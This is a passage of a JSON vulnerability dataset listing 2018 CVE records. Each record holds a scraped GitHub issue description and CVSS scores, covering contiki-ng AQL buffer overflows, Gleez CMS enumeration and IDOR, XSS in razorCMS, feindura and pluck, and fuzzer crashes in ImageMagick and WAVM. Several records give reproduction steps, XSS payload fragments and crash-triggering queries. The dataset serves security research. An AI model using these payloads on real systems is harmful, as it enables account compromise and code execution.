NUMBERTAG c NUMBERTAG is located NUMBERTAG bytes to the right of global variable 'vmcode' defined in 'aql APITAG NUMBERTAG c NUMBERTAG of size NUMBERTAG SUMMARY: APITAG global buffer overflow NUMBERTAG asan_memmove Shadow bytes around the buggy address NUMBERTAG bb7c NUMBERTAG bb7d NUMBERTAG bb7e NUMBERTAG bb7f NUMBERTAG bb NUMBERTAG bb NUMBERTAG f9]f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed 
heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  24982. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
  24983. "severity": "MEDIUM",
  24984. "baseScore": 6.1,
  24985. "impactScore": 4.2,
  24986. "exploitabilityScore": 1.8
  24987. },
  24988. {
  24989. "CVE_ID": "CVE-2018-16666",
  24990. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/595",
  24991. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/595",
  24992. "Repo_new": "contiki-ng/contiki-ng",
  24993. "Issue_Created_At": "2018-07-09T14:57:37Z",
  24994. "description": "Stack based buffer overflow while parsing AQL (parsing next string). Function next_string that provides next string during AQL parsing tries to memcpy input data (part of AQL files) into fixed size buffer. Allocated buffer can fit only DB_MAX_ELEMENT_SIZE NUMBERTAG bytes and the check is missing. Crashing line: aql APITAG Declaration of buffer: APITAG typedef char value_t[DB_MAX_ELEMENT_SIZE]; APITAG define DB_MAX_ELEMENT_SIZE NUMBERTAG APITAG value_t value; aql APITAG NUMBERTAG int lexer_start(lexer_t lexer, char input, token_t token, value_t value) { lexer >input = input; lexer >prev_pos = input; lexer >token = token; lexer >value = value; Overflow: aql APITAG memcpy(lexer >value, s, length); This could lead to Remote Code Execution via stack smashing attack (overwriting the function return address). The risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. Proposed CVSS score: PATHTAG NUMBERTAG critical) Following AQL code will trigger crash APITAG SELECT APITAG Mitigation : The size of input string should be limited to DB_MAX_ELEMENT_SIZE. 
Please take a look at patch fixing this issue in APITAG (using antelope engine as arastorage): URLTAG Crash details using Address Sanitizer: APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffd5e7b NUMBERTAG f0 at pc NUMBERTAG fb NUMBERTAG bp NUMBERTAG ffd5e7b NUMBERTAG d0 sp NUMBERTAG ffd5e7b NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffd5e7b NUMBERTAG f0 thread T NUMBERTAG fb NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG in next_string PATHTAG NUMBERTAG in lexer_next PATHTAG NUMBERTAG d NUMBERTAG in parse_aggregator PATHTAG NUMBERTAG d NUMBERTAG in parse_attributes PATHTAG NUMBERTAG ERRORTAG NUMBERTAG a4 in parse_attributes PATHTAG NUMBERTAG ERRORTAG NUMBERTAG a4 in parse_select PATHTAG NUMBERTAG b NUMBERTAG in aql_parse PATHTAG NUMBERTAG c1 in main PATHTAG NUMBERTAG fb NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG ffd5e7b NUMBERTAG f0 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG f in aql_parse PATHTAG This frame has NUMBERTAG object(s NUMBERTAG token NUMBERTAG le NUMBERTAG name NUMBERTAG alue' APITAG NUMBERTAG bceea NUMBERTAG f2 f2 f2 f NUMBERTAG f4 f4 f2 f2 f2 f NUMBERTAG f4]f NUMBERTAG bceea NUMBERTAG f3 f3 f3 f NUMBERTAG f1 f1 f1 f NUMBERTAG bceea NUMBERTAG bceeaa NUMBERTAG bceeab NUMBERTAG f4 f4 f4 f3 f3 f3 f NUMBERTAG bceeac NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  24995. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  24996. "severity": "HIGH",
  24997. "baseScore": 7.8,
  24998. "impactScore": 5.9,
  24999. "exploitabilityScore": 1.8
  25000. },
  25001. {
  25002. "CVE_ID": "CVE-2018-16667",
  25003. "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/597",
  25004. "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/597",
  25005. "Repo_new": "contiki-ng/contiki-ng",
  25006. "Issue_Created_At": "2018-07-09T15:08:31Z",
  25007. "description": "Global buffer overflow while parsing AQL (lvm_register_variable, lvm_set_variable_value, create_intersection, create_union). Functions APITAG APITAG APITAG APITAG write data into global fixed size buffers named variables and derivations making off by one error. Additionally functions APITAG APITAG APITAG (only in DEBUG mode), APITAG read the data from buffers variables and derivations making similar off by one error. Buffers are declared as: APITAG static variable_t variables[LVM_MAX_VARIABLE_ID NUMBERTAG APITAG static derivation_t APITAG NUMBERTAG Sample usage: APITAG for(var = variables; var APITAG name NUMBERTAG ar++) { Following AQL code samples will trigger crash: SELECT NUMBERTAG FROM NUMBERTAG WHERE NUMBERTAG This could potentially lead to Remote Code Execution, but attack is more difficult, because buffer is stored in global data segment APITAG APITAG The risk of this issue is reduced APITAG APITAG because attacker would need to run malicious AQL query, however it is quite possible when using database in APITAG application. 
Proposed CVSS score: PATHTAG NUMBERTAG high) Crash details using Address Sanitizer: APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG c NUMBERTAG at pc NUMBERTAG bp NUMBERTAG fff5f NUMBERTAG b0 sp NUMBERTAG fff5f NUMBERTAG a0 READ of size NUMBERTAG at NUMBERTAG c NUMBERTAG thread T NUMBERTAG in lookup PATHTAG NUMBERTAG in lvm_register_variable PATHTAG NUMBERTAG db in parse_operand PATHTAG NUMBERTAG db in parse_expr PATHTAG NUMBERTAG a4 in parse_comparison PATHTAG NUMBERTAG ERRORTAG NUMBERTAG b in parse_where PATHTAG NUMBERTAG ERRORTAG NUMBERTAG b in parse_select PATHTAG NUMBERTAG b NUMBERTAG in aql_parse PATHTAG NUMBERTAG c1 in main PATHTAG NUMBERTAG f NUMBERTAG bbeb NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG c NUMBERTAG is located NUMBERTAG bytes to the left of global variable 'global_data_size' defined in APITAG NUMBERTAG c NUMBERTAG of size NUMBERTAG c NUMBERTAG is located NUMBERTAG bytes to the right of global variable 'variables' defined in APITAG NUMBERTAG c1e0) of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG lookup Shadow bytes around the buggy address NUMBERTAG bb7f NUMBERTAG bb NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG f9 f9[f9]f NUMBERTAG bb NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG bb NUMBERTAG bb NUMBERTAG bb NUMBERTAG bb NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG 
internal: fe NUMBERTAG ABORTING",
  25008. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  25009. "severity": "HIGH",
  25010. "baseScore": 7.0,
  25011. "impactScore": 5.9,
  25012. "exploitabilityScore": 1.0
  25013. },
  25014. {
  25015. "CVE_ID": "CVE-2018-16703",
  25016. "Issue_Url_old": "https://github.com/gleez/cms/issues/802",
  25017. "Issue_Url_new": "https://github.com/gleez/cms/issues/802",
  25018. "Repo_new": "gleez/cms",
  25019. "Issue_Created_At": "2018-09-07T12:40:51Z",
  25020. "description": "Unauthenticated user enumeration and Possible account brute force leading to account compromise. Description : A vulnerability in the Gleez CMS login page could allow an unauthenticated, remote attacker to perform multiple user enumeration, which can further help the attacker to perform login attempts in excess of the configured login attempt limit. The vulnerability is due to insufficient server side access control and login attempt limit enforcement. An attacker could exploit this vulnerability by sending modified login attempts to the Portal login page. An exploit could allow the attacker to identify existing users and perform brute force password attacks on the Portal. Proof of concept : Any unauthenticated user can perform user enumeration by changing the id in the below URL. URLTAG This can help the user to identify the user names registered on the CMS portal. Since there is no account lockout implemented, the brute force attempt can be successfully executed. Also, there is no password complexity or strength defined while creating an account, which means passwords of significantly smaller length could be set, which makes it easy for the attacker. Version : Gleez CMS NUMBERTAG Impact : This can lead to confidentiality impact and potential account compromise.",
  25021. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  25022. "severity": "MEDIUM",
  25023. "baseScore": 5.3,
  25024. "impactScore": 1.4,
  25025. "exploitabilityScore": 3.9
  25026. },
  25027. {
  25028. "CVE_ID": "CVE-2018-16704",
  25029. "Issue_Url_old": "https://github.com/gleez/cms/issues/801",
  25030. "Issue_Url_new": "https://github.com/gleez/cms/issues/801",
  25031. "Repo_new": "gleez/cms",
  25032. "Issue_Created_At": "2018-09-07T10:54:59Z",
  25033. "description": "Insecure Direct Object Reference View other user profiles. Description : Observed IDOR vulnerability in demo site FILETAG It is possible for attackers (logged-in users) to view the profile pages of other users. Version : Gleez CMS NUMBERTAG ulnerability type: Insecure Direct Object Reference Steps to reproduce NUMBERTAG Login as a demo user Username : demo Password : demo NUMBERTAG After login, you can observe the URL URLTAG in the address bar NUMBERTAG Change the user ID, from NUMBERTAG to NUMBERTAG You will be able to view the other user's name and their profile page. Impact The vulnerability, if exploited, can allow users to view the profile of any other user, which they are not entitled to. The attacker can view the following NUMBERTAG Username NUMBERTAG Profile photo NUMBERTAG Last visited date NUMBERTAG Joined date NUMBERTAG Number of visits",
  25034. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  25035. "severity": "MEDIUM",
  25036. "baseScore": 4.3,
  25037. "impactScore": 1.4,
  25038. "exploitabilityScore": 2.8
  25039. },
  25040. {
  25041. "CVE_ID": "CVE-2018-16726",
  25042. "Issue_Url_old": "https://github.com/smiffy6969/razorCMS/issues/52",
  25043. "Issue_Url_new": "https://github.com/smiffy6969/razorcms/issues/52",
  25044. "Repo_new": "smiffy6969/razorCMS",
  25045. "Issue_Created_At": "2018-08-16T10:38:26Z",
  25046. "description": "HTML injection found. \u2022 APITAG version NUMBERTAG PHP Version NUMBERTAG Apache Version NUMBERTAG Operating system: microsoft windows NUMBERTAG ULNERABILTY TYPE: HTML injection. VULNERABILITY DESCRIPTION: HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. This vulnerability occurs when the user input is not correctly sanitized and the output is not encoded. An injection allows the attacker to send a malicious HTML page to a victim. The targeted browser will not be able to distinguish (trust) the legit from the malicious parts and consequently will parse and execute all as legit in the victim context. There is a wide range of methods and attributes that could be used to render HTML content. If these methods are provided with an untrusted input, then there is a high risk of XSS, specifically an HTML injection one. Malicious HTML code could be injected for example via APITAG that is used to render user inserted HTML code. If strings are not correctly sanitized the problem could lead to XSS based HTML injection. Another method could be APITAG Steps to reproduce NUMBERTAG Login to APITAG NUMBERTAG Go to setting and Edit the Homepage NUMBERTAG In the description, parameter insert the malicious HTML payload \"> APITAG youare hacked by a malicious hacker APITAG NUMBERTAG Save the page details NUMBERTAG Go to the homepage and refresh the browser, you will see the malicious content displayed on the browser. 
Proof of concept: Vulnerable URL: URLTAG Vulnerable Parameter: Description Malicious payload: \"> APITAG you are hacked by a malicious hacker APITAG NUMBERTAG enter the malicious payload \"> APITAG you are hacked by a malicious hacker APITAG into the description parameter. FILETAG NUMBERTAG After saving the details return to the homepage and refresh the browser, you will get that malicious HTML payload displayed on the browser. Submitted by: Ritesh kumar Reference: URLTAG",
  25047. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  25048. "severity": "MEDIUM",
  25049. "baseScore": 5.4,
  25050. "impactScore": 2.7,
  25051. "exploitabilityScore": 2.3
  25052. },
  25053. {
  25054. "CVE_ID": "CVE-2018-16727",
  25055. "Issue_Url_old": "https://github.com/smiffy6969/razorCMS/issues/51",
  25056. "Issue_Url_new": "https://github.com/smiffy6969/razorcms/issues/51",
  25057. "Repo_new": "smiffy6969/razorCMS",
  25058. "Issue_Created_At": "2018-08-15T11:50:53Z",
  25059. "description": "Stored Cross site Scripting (XSS) found. \u2022 APITAG version NUMBERTAG PHP Version NUMBERTAG Apache Version NUMBERTAG Operating system: microsoft windows NUMBERTAG ulnerability type: Cross site scripting(XSS) Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user\u2019s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also be called second-order XSS. This vulnerability can be used to conduct a number of browser based attacks including: Hijacking another user's browser Capturing sensitive information viewed by application users Pseudo defacement of the application Port scanning of internal hosts (\"internal\" in relation to the users of the web application) Directed delivery of browser based exploits Other malicious activities Stored XSS does not need a malicious link to be exploited. A successful exploitation occurs when a user visits a page with a stored XSS. The following phases relate to a typical stored XSS attack scenario: Attacker stores malicious code into the vulnerable page The user authenticates in the application User visits the vulnerable page Malicious code is executed by the user's browser This type of attack can also be exploited with browser exploitation frameworks such as APITAG XSS Proxy and Backframe. These frameworks allow for complex APITAG exploit development. Stored XSS is particularly dangerous in application areas where users with high privileges have access. When the administrator visits the vulnerable page, the attack is automatically executed by their browser. This might expose sensitive information such as session authorization tokens. 
STEPS TO REPRODUCE NUMBERTAG Login to APITAG NUMBERTAG Go to setting and Edit the Homepage NUMBERTAG In the keywords parameter enter the malicious XSS script APITAG \"> APITAG and enter some text in description parameter and save the page details NUMBERTAG Go to the homepage and either refresh the browser or refresh the home page, the malicious javascript will prompt on the browser. Proof Of Concept: Vulnerable URL: URLTAG Vulnerable parameter: Keywords Malicious XSS payload: APITAG \"> APITAG Vulnerable source code: FILETAG NUMBERTAG Go for editing the homepage and enter XSS payload APITAG \"> APITAG in Keywords field, enter some text in description part and save the page details. FILETAG NUMBERTAG After saving go to home page and either refresh the page or click on home, the malicious payload will be prompted on the browser. FILETAG Submitted by: Ritesh Kumar Reference: URLTAG URLTAG",
  25060. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  25061. "severity": "MEDIUM",
  25062. "baseScore": 5.4,
  25063. "impactScore": 2.7,
  25064. "exploitabilityScore": 2.3
  25065. },
  25066. {
  25067. "CVE_ID": "CVE-2018-16728",
  25068. "Issue_Url_old": "https://github.com/frozeman/feindura-flat-file-cms/issues/29",
  25069. "Issue_Url_new": "https://github.com/frozeman/feindura-flat-file-cms/issues/29",
  25070. "Repo_new": "frozeman/feindura-flat-file-cms",
  25071. "Issue_Created_At": "2018-08-15T10:59:46Z",
  25072. "description": "Reflected cross site scripting found (XSS). \u2022 Fiendura version NUMBERTAG PHP Version NUMBERTAG Apache Version NUMBERTAG Operating system: microsoft windows NUMBERTAG ULNERABILITY TYPE: cross site scripting. Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. STEPS TO REPRODUCE NUMBERTAG Log in to Fiendura NUMBERTAG Create a new page by clicking on the new page NUMBERTAG In the tags parameter, type the malicious javascript APITAG \"> APITAG NUMBERTAG The malicious javascript will be reflected in the browser. PROOF OF CONCEPT: Vulnerable URL: URLTAG Vulnerable parameter: Tags Malicious script: APITAG \"> APITAG NUMBERTAG enter the malicious javascript in the Tags parameter. FILETAG NUMBERTAG after entering the payload an XSS prompt will be reflected on the browser. FILETAG Submitted: Ritesh Kumar Reference: URLTAG",
  25073. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  25074. "severity": "MEDIUM",
  25075. "baseScore": 5.4,
  25076. "impactScore": 2.7,
  25077. "exploitabilityScore": 2.3
  25078. },
  25079. {
  25080. "CVE_ID": "CVE-2018-16729",
  25081. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/63",
  25082. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/63",
  25083. "Repo_new": "pluck-cms/pluck",
  25084. "Issue_Created_At": "2018-08-12T16:14:36Z",
  25085. "description": "XSS via svg fileupload : Pluck NUMBERTAG Affected software: Pluck NUMBERTAG Author: Ritesh kumar Description: SVG files can contain Javascript in APITAG tags. Browsers are smart enough to ignore scripts embedded in SVG files included via IMG tags. However, a direct request for an SVG file will result in the scripts being executed. So an embedded SVG as an attachment in an issue or avatar does not execute the code, but if a user clicks on the attachment the code will execute. Steps to reproduce NUMBERTAG login to pluck NUMBERTAG click on pages >manage files then browse and upload a malicious SVG file which contains an XSS payload NUMBERTAG Now open that file, which was saved as xss.svg; the output below will be shown. URL Where XSS got executed FILETAG FILETAG Vulnerable url: URLTAG",
  25086. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  25087. "severity": "MEDIUM",
  25088. "baseScore": 5.4,
  25089. "impactScore": 2.7,
  25090. "exploitabilityScore": 2.3
  25091. },
  25092. {
  25093. "CVE_ID": "CVE-2018-16749",
  25094. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1119",
  25095. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1119",
  25096. "Repo_new": "imagemagick/imagemagick",
  25097. "Issue_Created_At": "2018-05-01T22:12:58Z",
  25098. "description": "APITAG assertion failed. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Assertion fail in APITAG . APITAG Found with a modified version of the kAFL fuzzer ( URLTAG Credits: Sergej Schumilo, Cornelius Aschermann APITAG Universit\u00e4t Bochum) Steps to Reproduce APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS Additional information: APITAG",
  25099. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  25100. "severity": "MEDIUM",
  25101. "baseScore": 6.5,
  25102. "impactScore": 3.6,
  25103. "exploitabilityScore": 2.8
  25104. },
  25105. {
  25106. "CVE_ID": "CVE-2018-16750",
  25107. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1118",
  25108. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1118",
  25109. "Repo_new": "imagemagick/imagemagick",
  25110. "Issue_Created_At": "2018-05-01T22:09:49Z",
  25111. "description": "APITAG memory leak. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description Memory leak in APITAG ASAN Report: ERRORTAG Found with a modified version of the kAFL fuzzer ( URLTAG Credits: Sergej Schumilo, Cornelius Aschermann APITAG Universit\u00e4t Bochum) Steps to Reproduce APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS Additional information: APITAG",
  25112. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  25113. "severity": "MEDIUM",
  25114. "baseScore": 6.5,
  25115. "impactScore": 3.6,
  25116. "exploitabilityScore": 2.8
  25117. },
  25118. {
  25119. "CVE_ID": "CVE-2018-16759",
  25120. "Issue_Url_old": "https://github.com/teameasy/EasyCMS/issues/4",
  25121. "Issue_Url_new": "https://github.com/teameasy/easycms/issues/4",
  25122. "Repo_new": "teameasy/easycms",
  25123. "Issue_Created_At": "2018-07-25T06:11:31Z",
  25124. "description": "There is an xss vulnerability in the site search. Vulnerability file APITAG ERRORTAG $put filters XSS attacks with the APITAG function and the APITAG method is defined in the APITAG file: ERRORTAG Filtered common tags, but still not perfect, you can use some rare events to trigger xss POC APITAG APITAG FILETAG yaml POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG Intel Mac OS NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG think_template=default; APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG",
  25125. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  25126. "severity": "MEDIUM",
  25127. "baseScore": 6.1,
  25128. "impactScore": 2.7,
  25129. "exploitabilityScore": 2.8
  25130. },
  25131. {
  25132. "CVE_ID": "CVE-2018-16764",
  25133. "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/93",
  25134. "Issue_Url_new": "https://github.com/wavm/wavm/issues/93",
  25135. "Repo_new": "wavm/wavm",
  25136. "Issue_Created_At": "2018-07-26T13:02:05Z",
  25137. "description": "APITAG heap buffer overflow parsing running wasm file causing crash . Hello Reporting some possible vul MENTIONTAG Virtual Machine Vul Description: APITAG heap buffer overflow parsing running wasm file causing crash Impact Products version: the latest wavm lib git log pretty=oneline commit APITAG crash detail: APITAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG d NUMBERTAG a9 bp NUMBERTAG ffde NUMBERTAG sp NUMBERTAG ffde NUMBERTAG d NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG d NUMBERTAG a8 in __asan_memcpy PATHTAG NUMBERTAG f4fb NUMBERTAG eb7d7 in APITAG ( PATHTAG NUMBERTAG f4fb NUMBERTAG ead in APITAG ( PATHTAG NUMBERTAG f4fb3dcc NUMBERTAG in APITAG APITAG APITAG ( PATHTAG NUMBERTAG f4fb3ee NUMBERTAG in void APITAG APITAG APITAG const ( PATHTAG NUMBERTAG f4fb3ee1cc1 in void APITAG APITAG APITAG APITAG APITAG void APITAG APITAG NUMBERTAG PATHTAG NUMBERTAG f4fb3e1d NUMBERTAG in void APITAG APITAG ( PATHTAG NUMBERTAG f4fb3dce NUMBERTAG in APITAG APITAG ( PATHTAG NUMBERTAG f4fb3dce NUMBERTAG c in APITAG APITAG ( PATHTAG NUMBERTAG in APITAG const&, APITAG ( PATHTAG NUMBERTAG in APITAG const , APITAG ( PATHTAG NUMBERTAG c in APITAG const&) ( PATHTAG NUMBERTAG a4c in main ( PATHTAG NUMBERTAG f4fafb4eb NUMBERTAG in __libc_start_main APITAG NUMBERTAG aa1 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG in operator new(unsigned long) PATHTAG NUMBERTAG f4fb NUMBERTAG c1c NUMBERTAG in APITAG long, unsigned long, std::allocator APITAG const&) APITAG NUMBERTAG f4fb NUMBERTAG c NUMBERTAG in std::basic_string<char, std::char_traits APITAG , std::allocator APITAG >::basic_string(char const , std::allocator APITAG const&) APITAG SUMMARY: APITAG heap buffer overflow PATHTAG in __asan_memcpy Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa 
fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff8e NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  25138. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25139. "severity": "HIGH",
  25140. "baseScore": 8.8,
  25141. "impactScore": 5.9,
  25142. "exploitabilityScore": 2.8
  25143. },
  25144. {
  25145. "CVE_ID": "CVE-2018-16765",
  25146. "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/94",
  25147. "Issue_Url_new": "https://github.com/wavm/wavm/issues/94",
  25148. "Repo_new": "wavm/wavm",
  25149. "Issue_Created_At": "2018-07-26T13:07:25Z",
  25150. "description": "APITAG heap buffer overflow when parsing running wasm file causing crash . FILETAG",
  25151. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25152. "severity": "HIGH",
  25153. "baseScore": 8.8,
  25154. "impactScore": 5.9,
  25155. "exploitabilityScore": 2.8
  25156. },
  25157. {
  25158. "CVE_ID": "CVE-2018-16766",
  25159. "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/96",
  25160. "Issue_Url_new": "https://github.com/wavm/wavm/issues/96",
  25161. "Repo_new": "wavm/wavm",
  25162. "Issue_Created_At": "2018-07-26T13:09:25Z",
  25163. "description": "APITAG reached unreachable code parsing running wasm file causing crash . FILETAG",
  25164. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25165. "severity": "HIGH",
  25166. "baseScore": 8.8,
  25167. "impactScore": 5.9,
  25168. "exploitabilityScore": 2.8
  25169. },
  25170. {
  25171. "CVE_ID": "CVE-2018-16767",
  25172. "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/97",
  25173. "Issue_Url_new": "https://github.com/wavm/wavm/issues/97",
  25174. "Repo_new": "wavm/wavm",
  25175. "Issue_Created_At": "2018-07-26T13:10:42Z",
  25176. "description": "APITAG const , APITAG heap buffer overflow parsing running wasm file causing crash. FILETAG",
  25177. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  25178. "severity": "HIGH",
  25179. "baseScore": 8.8,
  25180. "impactScore": 5.9,
  25181. "exploitabilityScore": 2.8
  25182. },
  25183. {
  25184. "CVE_ID": "CVE-2018-16768",
  25185. "Issue_Url_old": "https://github.com/AndrewScheidecker/WAVM/issues/98",
  25186. "Issue_Url_new": "https://github.com/wavm/wavm/issues/98",
  25187. "Repo_new": "wavm/wavm",
  25188. "Issue_Created_At": "2018-07-26T13:11:56Z",
